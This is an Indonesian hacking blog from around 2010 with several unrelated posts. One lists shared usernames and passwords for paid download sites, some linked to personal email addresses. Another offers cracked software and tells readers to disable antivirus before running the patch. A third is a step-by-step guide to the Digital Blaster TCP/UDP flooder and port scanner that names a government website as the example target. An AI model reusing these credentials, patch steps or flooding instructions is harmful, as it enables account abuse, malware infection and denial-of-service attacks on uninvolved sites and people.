Klo dah login klik tombol Start yang letaknya aja dibagian kanan atas. Trus klik "Promotion" lalu "Banners and Links". Nah disitukan ada banyak banget contoh iklannya, tinggal pilih deh sesuai keinginan kamu lalu klik"Get banner code". Klo udah tinggal copy paste kodenya ke web/ blog kamu.Sekian dulu dari saya semoga bermanfaat.

Ditunggu komentnya biar tau nih postingan berguna apa kagak. . . . .

Selasa, 23 Maret 2010

Username dan password premium download gratis

Download software, games, movie, templates sepuasnya adalah dambaan setiap pengguna internet. Secara teknis sebenarnya dapat dicari menggunakan Google atau mengunjungi situs-situs warez, DDL atau Nulled, namun terkadang tidak lengkap. Beberapa situs menyediakan fasilitas download cepat seperti Usenext, tapi kita harus mengeluarkan sedikit dollar untuk menebus username dan account premiumnya. Berikut 16 situs download beserta account premiumnya. Gunakan dengan bijak ya!

1). www.divxcrawler.com


Username : divx273
Password : 8342729


2). www.butterflydownloadnetwork.com

Username : cinemanetwork20

Password : butterfly20



3). www.downloadprofessional.com
Username : lo886Ees

Password : zAgt88er


4). www.sharingzone.net

Username : LODMQYHX

Password : 375021402

Receipt : 4T5W89RD


5). www.unlimitedgamedownloads.com

Username : ga20me

Password : ke01feb


6). www.watchdirect.tv

Username : cinemanetwork20

Password : butterfly20


7). www.fullreleasez.com

Username : Af872HskL

Password : XjsdH28N


8). www.fulldownloads.us

Username : Af872HskL

Password : XjsdH28N


9). www.pirateaccess.com

Username : yourfrienddalat@gmail.com

Password : CHh5LKPI


Username : xxx_heel_xxx@yahoo.com

Password : MJY0BUY

Username : i_l0ve_u_786@yahoo.com

Password : rYvLgPrt


Username : mubashar_siddique@yahoo.com

Password : F9Gzgwb5


10). www.warezquality.com

Username : ageg2020

Password : z8fsDfg3


11). wwww.warezreleases.com

Username : HnRPxKQz

Password : a59KBV7


Username : a25bipZP

Password : 1TeVnoJb


Username : SHYyJfWU

Password : P4K20uO


12). www.fulldownloadaccess.com

Username : mpuv3y

Password : umvpy3x


13). www.alphaload.com

Username : AL3429352

Password : ykbcKTNS


Username : AL3429355

Password : RCHAbhKM


Username : AL3429350

Password : gMZNFcyS


Username : AL3429351

Password : cTAkWAxc



Username : AL3429352
Password : ykbcKTNS


14) www.gamedownloadnow.com

Username : ga20me

Password : ke01feb

15). www.unlimiteddownloadcenter.com

Username : cu20me

Password : ke01feb


16). www.tvadvanced.com

Username : mv03dl

Password : frmvdl

Tweak Master Pro 3.04 With Patch

This program differs from other tweaking, above all, a narrow focus. If other optimizers often include a variety of utilities bootblack roster until backup units, TweakMASTER contains only the means to configure the Internet connection.

In general we can say that the program is very complete solution and will be a great helper for those who work a lot on the Internet. It includes virtually all of the tools that they can come in handy - from utilities to synchronize the system time to the means to download Web pages in the background.
  • Connection Optimization Wizard (Wizard optimize connection) This module is a step by step wizard, which allows you to configure the Internet connection is best. This user does not need to set any settings - only need to specify the type of Internet connection and a way to connect to the Internet, and then choose one of three options to optimize (in the program, they are called - option 1, 2 and 3). If optimization has not brought the desired result, you may want to choose another option or with the same master to return to their original settings.
  • Advanced Optimization Settings (advanced settings optimization) If the previous module is designed for novice users and does not require any knowledge about a system like this, rather, more experienced computer scientists. With it you can manually configure some settings network adapter and connect to the Internet. It should be noted that there is a rollback option, which will help in case of selecting the parameters failed to return everything as it was.
  • DNS Accelerator (accelerator DNS) When you enter the site name in a browser window, the program must convert the text into a numeric address. It takes some time, since thiscomputer sends a request to the DNS-server provider, after which he sends it to the server domain. DNS Accelerator module stores this information for sites you visit directly on yourcomputer, which greatly speeds up the work.
  • Connection Speed Measurement (measurement of the speed of communication) module that allows to test the quality of Internet connection.
  • Advanced Ping & TraceRoute - module that allows to detect the source of the problems encountered when using the Internet and local network.
  • Network Connections Viewer - the module for viewing open network connections, TCP and UDP ports in real time.
  • Clock Synchronization - synchronize the system time with the servers of exact time. There is a list of servers to which you can add your own.
  • Keep Connected - module to avoid bursting the Internet connection to your ISP.
  • Smart WhoIs - utility to obtain information about the domain or IP-address.
  • LinkFox - an additional module that allows to speed up surfing at the expense of the autonomous loading of these options.
Would you like to :
  • Automatically optimize and speed up any type of Internet connection.
  • Use advanced, yet easy to use, networking diagnostics and troubleshooting tools.
  • Optimize Internet Explorer and Firefox for snappier web surfing.
  • Be in total control of all networking configuration settings.
  • Specific optimizations for every Windows version from Windows 2000 to Windows 7.
Whats New On TweakMaster 3.04 :
  • TweakMASTER has been updated for a better compatibility with localized versions of Windows Vista and Windows 7 (users of German Windows Vista are the most affected).
  • An optional Ask toolbar has been removed from TweakMASTER installer.
  • Several minor fixes and improvements.
Buat yang sudah request TweakMASTER, langsung aja di download. Okeiii


NB: Tips dari saya, sewaktu ingin mempatch TweakMASTER Pro 3.04, harap disable antivirus nya dahulu. Bagi yang takut, jangan coba tips ini. Okeiii
Download TweakMASTER Pro 3.04 With Patch

Digital Blaster

Q1: Apa itu Digital Blaster?
Digital Blaster adalah sebuah Flooder internet dan jaringan komputer yang bisa didapatkan melalui beberapa media di YogyaFree seperti CD/DVD, www.yogyafree.net maupun di situs penulis (www.geocities.com/ferdianelli/digiblast.html). Digital Blaster disingkat menjadi DigiBlast merupakan hack tool gratis dan bebas untuk disebarluaskan dengan syarat tidak untuk konsumsi profit seperti menjual atau membelinya dari seseorang. Versi terbaru Digital Blaster v1.2.0 built 08.2007 telah di-update pada bulan Agustus 2007. Prinsip kerja program ini adalah mengirimkan paket secara berkala ke sebuah alamat IP dan port-port yang ditentukan.

Q2: Sistem dan instalasi?
Digital Blaster dapat berjalan di Windows 95, 98, XP. Windows Vista tidak mendukung. Ekstrak semua file yang terdapat didalam digiblast.zip dan klik digiblast2.exe.

Q3: Bagaimana cara menggunakan DigiBlast?
Pada versi 1.2.0 built 08.2007, DigiBlast dapat mengirimkan paket ke alamat IP target ke sebuah port yang ditentukan oleh user (“Single Port Flooder”) maupun ke banyak port yang terbuka (“Multi Port Flooder”). Yang perlu anda lakukan untuk mengirimkan paket ke alamat IP target adalah:  Memastikan bahwa alamat IP target aktif dan terhubung ke internet. Dapat anda lakukan di mirc dengan mengetikkan perintah di kolom status : /dns nickname atau
/dns domainsitus. Contoh : /dns poni atau /dns www.yogyafree.net.  Mengetahui port yang terbuka pada komputer target. Anda membutuhkan port scanner. Digital Blaster pada mode Multi Port Flooder bisa menjadi sebuah port scanner.

Mode Single Port Flooder



Isi kolom IP address : alamat IP target.
Contoh :
IP Address : www.indonesia.go.id
Atau IP address yang anda dapatkan dengan mIRC /DNS
IP Address : 125.XXX.XX.XX
Catatan :
Jika anda ingin membanjiri koneksi seseorang di mIRC, anda tidak bisa langsung mengisi nicknamenya langsung di kolom IP address. Anda harus mengetahui terlebih dahulu alamat IP-nya.
Isi Kolom Data To Send : Data
Contoh :
Data To Send : Isikandengankaraktersembarangan
Atau mengirimkan permintaan kepada server
Data To Send : GET / HTTP/1.1
Isi Kolom Port : Port
Contoh :
Port : 110
Maka program akan konek ke port 110 dan membanjiri port tersebut dengan data
paket.
Port yang terbuka pada windows pada umumnya adalah 25, 110, 135, 389, 1025.
Isi Kolom Repeat : Jumlah paket yang akan dikirim ke target
Contoh :
Repeat : 100000
Maka DigiBlast akan mengirimkan seratus ribu kali paket ke komputer target
Catatan : Times Left menunjukkan jumlah paket yang tersisa.
Isi Kolom Delay : interval waktu pengiriman paket per detik
Contoh :
Delay : 1000
maka interval waktu pengiriman paket adalah 1 detik = 1 paket. Jika angka Delay
semakin kecil maka paket yang dikirimkan akan semakin banyak setiap detiknya. Batas
minimal Delay = 1.
Ceklis Flood Mode
TCP FLOOD – Paket dikirimkan melalui protokol TCP/IP
UDP FLOOD - Paket dikirimkan melalui protokol UDP
DUAL PROTOCOL FLOOD - Paket dikirimkan melalui protokol TCP/IP dan UDP
Klik Flood untuk membanjiri , Halt atau Cancel untuk menghentikan. Clear untuk menghapus laporan.

Mode Multi Port Flooder

Multi Port Flooder berfungsi untuk mengirimkan paket ke semua port yang terbuka pada komputer target. Program akan mencoba mencari port-port yang terbuka pada komputer target untuk melakukan koneksi melalui protokol TCP/IP. Mode Multi Port Flooder tidak hanya berfungsi sebagai flooder tetapi juga sebagai port scanner Isi kolom Port/Time : Jumlah Port per koneksi
Contoh
Port/Second : 100
maka program akan mencoba melakukan koneksi sebanyak seratus port secara berurut sesuai dengan yang telah ditentukan user
Isi kolom Port: port awal To: port akhir
Contoh

Port: 20 To: 1000
Maka program akan mencoba melalukan koneksi mulai dari port 20 s/d port 1000
Ceklis Don`t Stop Me To Flood
Don`t Stop Me To Flood – Program akan terus melakukan koneksi ke komputer target tanpa berhenti. Jika ceklis dihilangkan, maka program akan berhenti setelah pengiriman paket selesai sesuai dengan Port: port awal To: port akhir yang telah ditentukan oleh user. Klik Flood untuk membanjiri , Halt untuk menghentikan. Clear untuk menghapus laporan.

Buat softwarenya silahkan download disini.

Dikutip dari:xcode_magazine edisi8

Kamis, 18 Maret 2010

Harga dan Spesifikasi Apple iPad

 iPad adalah komputer tabled yang baru saja dirilis oleh Apple. Pada tanggal 27 januari 2010 kemarin, di San Fransisco. Seperti kita ketahui bahwa gosip teknologi di tahun 2010 ini adalah jamannya komputer tabled. iPad kini menjadi bahan gosip para pencinta gadget. iPad adalah perangkat komputer jinjing diantara laptop dan smartphone. Disebut juga komputer tabled. Modelnya keren banget deh. Agak mirip dengan iPhone namun iPad lebih besar lagi bentuknya dengan layar yang lebar.










Apple menawarkan iPad dalam enam varian dengan kisaran harga dari 499 hingga 829 dollar AS. Hal tersebut tergantung ukuran memori yang tersedia dalam 3 pilihan, yakni 16 GB, 32 GB, dan 64 GB, serta dua pilihan model masing-masing hanya dengan koneksi WiFi atau WiFi dan 3G GSM. Untuk sementara iPad baru tersedia di AS. Namun, dalam 2-3 bulan
akan dikirimkan ke seluruh dunia.



Berikut spesifikasi Apple iPad :

Ukuran:

- Panjang: 24,8 cm

- Lebar: 18,97 cm

- Tebal: 1,34 cm

- Berat: 0,68 kg (WiFi model) dan 0,73 kg (WiFi + 3G model)


Layar:

- 9,7 inci LED backlit glossy widescreen multitouch dengan teknologi IPS

- Resolusi 1024x768 pixel dengan 132 pixel per inci

- Dilapisi fingerprint resistant oleophobic

- Mendukung penulisan banyak bahasa dan karakter secara bersamaan


Kapasitas memori:

- Flash drive 16 GB, 32 GB, atau 64 GB


Prosesor :

- Apple A4 1 GHZ


Sensor:

- Akselerometer

- Ambient light sensor


Baterai:

- Baterai Lithium polymer

- Daya tahan hingga 10 jam waktu aktif dan satu bulan waktu standby


Audio playback:

- Mendukung format AAC (16 hingga 320 Kbps)

- Mendukung format Protected AAC (16 hingga 320 Kbps)

- Mendukung format MP3 (16 hingga 320 Kbps)

- Mendukung MP3 VBR, Audible (format 2,3, dan 4), Apple Losless, AIFF, dan WAV


Koneksi:

Untuk WiFi model

- WiFi 802.11 a/b/g/n

- Bluetooth 2.1 + teknologi EDR



Untuk WiFi + 3G model

- UMTS/HSDPA triband (850, 1900, dan 2100 MHz)

- GSM/EDGE quabband850, 900, 1800, dan 1900 MHz)

- WiFi 802.11 a/b/g/n

- Bluetooth 2.1 + teknologi EDR


Input dan output
- Dock connector

- 3,5 mm stereo headphone jack

- Built in speaker

- Microphone

- SIM card tray (untuk model WiFi + 3G)


Layanan berbasis lokasi

- WiFi

- Kompas digital

- Assisted GPS (khusus model WiFi + 3G)

- Seluler (khusus model WiFi + 3G)


TV dan video

- Mendukung format video H.264 hingga 720p, .m4v, .mp4, .mov, MPEG-4.


Tombol eksternal

- On/off/sleep/wake

- Mute

- Volume naik atau turun


Fitur dan Aplikasi utama:

- Browser Safari untuk akses web.

- Mail untuk membaca e-mail.

- Photos untuk mengelola arsip foto.

- Video untuk memutar file video.

- YouTube untuk melihat video langsung ke YouTube tanpa melalui webnya.

- iPod untuk memainkan musik

- iTunes untuk mengunduh musik dan video

- App Store untuk mengunduk aplikasi

- iBooks untuk membaca dan mengunduh e-book dari iBooks Store

- Maps untuk melihat peta resolusi tinggi dari satelit dan Street View Images.

- Notes untuk membuat catatan bebas.

- Calendar untuk membuat agenda.

- Contacts untuk mencatat data telepon, email, dan web teman.

- Home screen untuk mengatur tampilan layar

- Spotlight search untuk melakukan pencarian cepat di semua bagian hanya dengan mengetikkan keyword.

Download Anti Keylogger

Download anti keylogger gratis, apaan tuh ? Tahu Keylogger kan? Salah satu software yang digunakan para hacker untuk bisa mendapatkan account email anda. Yah, bila anda pernah menemukan kasus friendster atau facebook di hack.
Keylogger inilah salah satu penyebabnya. Keylogger ini berfungsi untuk merekam aktivitas yang dilakukan di keyboard komputer anda. Biasanya ditujukan pada komputer publik alias warnet. Apapun yang anda ketikkan di keyboard akan terekam di software keylogger mereka. Jadi berhati-hatilah main di warnet. Berhati-hatilah memasukkan id dan password email penting anda di warnet. Bisa saja komputer yang anda mainin itu ada keyloggernya.

Untuk itu Belajar Hack coba beri solusi nih, dengan Software Anti Keylogger. Anda bisa download anti keylogger ini dengan gratis. Link downloadnya ada di bawah, di baca aja dulu basa-basi ini yah, hihihi.

Ok sekarang anda bisa download anti keylogger gratis di bawah ini :


DOWNLOAD ANTI KEYLOGGER




 

Total Tayangan Halaman

BANNER

Belajar Hack Copyright © 2009 Premium Blogger Dashboard Designed by SAER

WELCOME TO BELAJAR HACK | BLOG BUAT ORANG-ORANG YANG INGIN BELAJAR HACKING | TIPS TRICK | DOWNLOAD SOFTWARE GRATIS FULL VERSION